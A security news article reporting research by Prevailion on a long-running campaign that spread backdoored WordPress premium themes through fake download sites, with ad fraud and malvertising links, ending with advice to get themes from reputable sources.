Over 20,000 WordPress Sites Run Trojanized Premium Themes

Over 20,000 WordPress Sites Run Trojanized Premium Themes

The Content Management System (CMS) WordPress is very popular with private individuals as well as with companies: It makes it easier and faster to implement and maintain your own, professional-looking website and expand it with suitable plugins. This popularity makes WordPress interesting for cyber gangsters too. Security researchers have now published their findings on a campaign that has been running since 2017, in the course of which criminals managed to inject malicious code onto at least tens of thousands of web servers worldwide.

The cyber gangsters hid the code in so-called "Premium Themes" for WordPress. A theme is a kind of template that specifies the design, layout and also part of the functionality of the websitfe. The "Premium" editions of such themes are usually chargeable and should be distinguished from the free versions by a more professional programming along with design, features etc. The downside is that a ready-made theme brings with it a large number of scripts and other (confusing) files, which are often seldom examined by their buyers.

Stolen themes with unwanted extras.

This played into the hands of the criminals. According to the research team of the IT security company Prevailion, they offered contaminated premium themes on around 30 platforms that they had set up for this purpose. They apparently predominantly advertised that they usually offer free premium themes - probably stolen from other platforms and developers - for free.

From the platforms, the themes should have landed on at least 20,000 web servers, among which the research team - or the search engine operated by Prevailion for compromise notices - was able to assign a fifth to small and medium-sized companies from all over the world.

Backdoor, ad fraud and malvertising

As the team from Prevailion reports in a blog entry, those with the prepared premium themes unwittingly installed a backdoor, through which the criminals could add admin accounts, but also read out email accounts and WordPress password hashes of the existing admins. The prepared themes also loaded additional (malicious) code from command-and-control servers.
Prevailion has created a list of 30 fake shops with the infected themes.

The websites with the prepared themes were integrated into the "Propeller Ads" advertising network. Visitors were shown advertisements; every click on such an advertisement put a little money in the gangsters' coffers. According to the researchers' observations, the advertising network not only played advertisements, but also showed website visitors requests to update certain (supposedly outdated) software components.

 The blog entry does not reveal which malware fusers downloaded to their computers by clicking on the prompts. However, another team of researchers had recently observed how "Propeller Ads" redirected visitors to other domains on which the exploit kit "Fallout" was lurking. Using security gaps in Flash and Windows, Fallout previously placed GandCrab (now no longer active) ransomware on vulnerable computers.

Better to be on the safe side 

If you plan to install a premium theme in the future, you should look for serious offers on the official WordPress website or on known platforms instead of risking the security of your web server and also that of the site's visitors for a relatively small amount of money.